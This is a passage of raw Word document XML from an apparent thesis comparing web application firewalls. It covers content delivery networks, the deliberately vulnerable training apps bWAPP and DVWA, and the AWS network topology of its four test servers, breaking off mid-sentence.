      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc71138523"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00C561EC">
        <w:t xml:space="preserve">Traffic through Cloudflare (Cloudflare, </w:t>
      </w:r>
      <w:r w:rsidR="00943C00">
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidRPr="00C561EC">
        <w:t>.)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="714B9A36" w14:textId="2714BC24" w:rsidR="00DD1A3D" w:rsidRPr="005A19CE" w:rsidRDefault="00F466C1" w:rsidP="00F466C1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc71138484"/>
      <w:r>
        <w:t xml:space="preserve">2.3.4 </w:t>
      </w:r>
      <w:r w:rsidR="00DD1A3D" w:rsidRPr="005A19CE">
        <w:t>Content Delivery Network (CDN)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="3925917F" w14:textId="2653482A" w:rsidR="00DD1A3D" w:rsidRDefault="005A19CE" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>A CDN refers to a globally distributed network consisting of proxy servers and data centres</w:t>
      </w:r>
      <w:r w:rsidR="00926F24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or PoP</w:t>
      </w:r>
      <w:r w:rsidR="0088295B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. Its purpose is to reduce latency in loading of websites and web applications. This is achieved by reducing the physical distance between the client and server</w:t>
      </w:r>
      <w:r w:rsidR="00FC2B82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, according to </w:t>
      </w:r>
      <w:r w:rsidR="00FC2B82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Akamai (</w:t>
      </w:r>
      <w:r w:rsidR="00943C00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidR="00FC2B82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00276112">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Akamai also reported that traffic that is served by a CDN makes up of more than 50% of the internet’s traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A7872D" w14:textId="117C5652" w:rsidR="00CA2CF7" w:rsidRDefault="00EC2670" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>A CDN works by storing cached versions of a website and serving the cached version to the client from the PoP geographically nearest to the client.</w:t>
      </w:r>
      <w:r w:rsidR="00D94A09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Imperva and Cloudflare have their own CDNs too. Today, Imperva has 47 PoPs available across the globe while Cloudflare has 150</w:t>
      </w:r>
      <w:r w:rsidR="00485395">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> PoPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F184348" w14:textId="041AA19B" w:rsidR="00D03D96" w:rsidRPr="004206C1" w:rsidRDefault="00F466C1" w:rsidP="00F466C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc71138485"/>
      <w:r>
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:r w:rsidR="00D03D96" w:rsidRPr="004206C1">
        <w:t>Vulnerable Web Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="3E08109C" w14:textId="0928C3A6" w:rsidR="00D03D96" w:rsidRDefault="00A60B49" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>There are millions of web applications available on the internet today. There are a handful of web applications that are purposefully made vulnerable and made available for the public to use. Many of them were developed by renowned companies for the sake of cyber security awareness and educational purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE67B30" w14:textId="4D17226D" w:rsidR="00BD4F57" w:rsidRDefault="00BD4F57" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This thesis used two of such web applications, namely, buggy web application (bWAPP) and Damn Vulnerable Web Application (DVWA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F5CAA8" w14:textId="5AE6857B" w:rsidR="00D03D96" w:rsidRPr="001732B7" w:rsidRDefault="00F466C1" w:rsidP="00F466C1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc71138486"/>
      <w:r>
        <w:t xml:space="preserve">2.4.1 </w:t>
      </w:r>
      <w:r w:rsidR="001732B7" w:rsidRPr="001732B7">
        <w:t>Buggy Web Application (</w:t>
      </w:r>
      <w:r w:rsidR="00D03D96" w:rsidRPr="001732B7">
        <w:t>bWAPP</w:t>
      </w:r>
      <w:r w:rsidR="001732B7" w:rsidRPr="001732B7">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="25ED678C" w14:textId="013D9F9B" w:rsidR="00D03D96" w:rsidRDefault="00B16A68" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">One the web applications used in this thesis is bWAPP, which was developed by Malik Mesellem. It </w:t>
      </w:r>
      <w:r w:rsidR="0051334B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">is a free and open-source </w:t>
      </w:r>
      <w:r w:rsidR="000F5314">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP/MySQL </w:t>
      </w:r>
      <w:r w:rsidR="0051334B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerable web application </w:t>
      </w:r>
      <w:r w:rsidR="000F5314">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00B12CA0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0051334B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>contains over 100 web vulnerabilities. The vulnerabilities include OWASP Top 10 and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71687783" w14:textId="3FA8B9D4" w:rsidR="00D03D96" w:rsidRPr="00BD4F57" w:rsidRDefault="00F466C1" w:rsidP="00F466C1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc71138487"/>
      <w:r>
        <w:t xml:space="preserve">2.4.2 </w:t>
      </w:r>
      <w:r w:rsidR="00BD4F57" w:rsidRPr="00BD4F57">
        <w:t>Damn Vulnerable Web Application (DVWA)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="465B0A97" w14:textId="4647D533" w:rsidR="000E2933" w:rsidRPr="00DE6606" w:rsidRDefault="00B12CA0" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA is the other vulnerable web application used in this thesis. DVWA </w:t>
      </w:r>
      <w:r w:rsidR="000F5314">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">is a PHP/MySQL vulnerable web application that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="000F5314">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">developed </w:t>
      </w:r>
      <w:r w:rsidR="008E0875">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Robin Wood. DVWA also covers most of the known vulnerabilities and was said to potentially have some that are unknown.</w:t>
      </w:r>
      <w:r w:rsidR="000E2933" w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="546804A6" w14:textId="4719AA30" w:rsidR="00133670" w:rsidRPr="00DE6606" w:rsidRDefault="00DA7190" w:rsidP="004A336C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc71138488"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00133670" w:rsidRPr="00DE6606">
        <w:t>Method</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="4F00B8CC" w14:textId="11375A71" w:rsidR="00F81A8F" w:rsidRDefault="00F81A8F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In this section, we look into the</w:t>
      </w:r>
      <w:r w:rsidR="00170EDB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> network topology,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F4E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">how the servers are set up on AWS, how </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF is </w:t>
      </w:r>
      <w:r w:rsidR="003F4E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>onboarded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="003F4E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>configuration with each server</w:t>
      </w:r>
      <w:r w:rsidR="009C5A2F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00620DC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> We then </w:t>
      </w:r>
      <w:r w:rsidR="00385BA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">take a </w:t>
      </w:r>
      <w:r w:rsidR="00620DC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>look into the test plans</w:t>
      </w:r>
      <w:r w:rsidR="00A87146">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test or compare each WAF for price, performance, alerts and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8CEB8E" w14:textId="4BB8E3FC" w:rsidR="00F81A8F" w:rsidRPr="00F81A8F" w:rsidRDefault="00DA7190" w:rsidP="00DA7190">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc71138489"/>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00F81A8F" w:rsidRPr="00F81A8F">
        <w:t>Network Topology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="36D862C3" w14:textId="2D3AED6D" w:rsidR="003660EE" w:rsidRDefault="00A200FA" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In this setup, everything was set up in the cloud. No physical servers or hardware were self-owned, except for client (source) machine.</w:t>
      </w:r>
      <w:r w:rsidR="00A27023">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005550C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">There </w:t>
      </w:r>
      <w:r w:rsidR="001E719A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="005550C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> four </w:t>
      </w:r>
      <w:r w:rsidR="001E719A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">servers set up to be connected to the internet. </w:t>
      </w:r>
      <w:r w:rsidR="003660EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Each server hosted a site, cloudsecurity.gq, modsectest.cf, imptest.cf and clfltest.cf respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB98DE3" w14:textId="4DAB11D8" w:rsidR="00F81A8F" w:rsidRDefault="001E719A" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The first was not configured to any WAF, second server was configured with ModSecurity’s WAF on premise</w:t>
      </w:r>
      <w:r w:rsidR="00AE0E25">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, the third server was not configure</w:t>
      </w:r>
      <w:r w:rsidR="003B5C0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00AE0E25">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a WAF </w:t>
      </w:r>
      <w:r w:rsidR="004A0A54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">on premise </w:t>
      </w:r>
      <w:r w:rsidR="00AE0E25">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>but traffic was restricted to Imperva’s public IP addresses and similar to the third server’s setup, the fourth server was</w:t>
      </w:r>
      <w:r w:rsidR="004A0A54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> restricted to Cloudflare’s public IP addresses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D5293E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The reason for restricting access on the third and fourth servers to Imperva’s and Cloudflare’s public IP addresses respectively is to deny direct access to the servers. All traffic would then need to access the servers through the respective cloud WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758232DB" w14:textId="7F9DA522" w:rsidR="00BD6A76" w:rsidRDefault="00BD6A76" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The internal and public IP addresses and DNS were assigned by AWS, which will be elaborated in the next subsection, Infrastructure on AWS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E5AFE" w14:textId="2A9640D2" w:rsidR="009C1CFE" w:rsidRDefault="007B4E56" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Secure sockets layer (</w:t>
      </w:r>
      <w:r w:rsidR="009C1CFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>) certificates</w:t>
      </w:r>
      <w:r w:rsidR="009C1CFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="009C1CFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> not configured in this setup. This means that the data passing through the network was not encrypted. This would allow for the traffic to be intercepted and modified during the tests later on in this paper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D1075" w14:textId="62C4AD7A" w:rsidR="005550C8" w:rsidRPr="00DE6606" w:rsidRDefault="00E47B55" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00CA1C2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows t</w:t>
      </w:r>
      <w:r w:rsidR="00990E52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">he first server’s </w:t>
      </w:r>
      <w:r w:rsidR="005550C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>network topology</w:t>
      </w:r>
      <w:r w:rsidR="00990E52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, the client connects to the internet then to the web server that was not configured with any WAF and hosted the site cloudsecurity.gq.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7C55D6" w14:textId="18BED82E" w:rsidR="00C9459B" w:rsidRDefault="00C9459B" w:rsidP="009B2B66">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E542269" wp14:editId="5B27AD0E">
            <wp:extent cx="5111199"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5816" b="13775"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5219753" cy="1284003"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C780D56" w14:textId="09E0B54E" w:rsidR="009B2B66" w:rsidRDefault="009B2B66" w:rsidP="009B2B66">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc71138524"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Network topology without WAF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="3E50F1E2" w14:textId="6AD1E030" w:rsidR="00C9459B" w:rsidRDefault="00990E52" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00CA1C2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows the second server’s network topology, the c</w:t>
      </w:r>
      <w:r w:rsidR="001E719A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">lient connects to the internet then to the web server that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
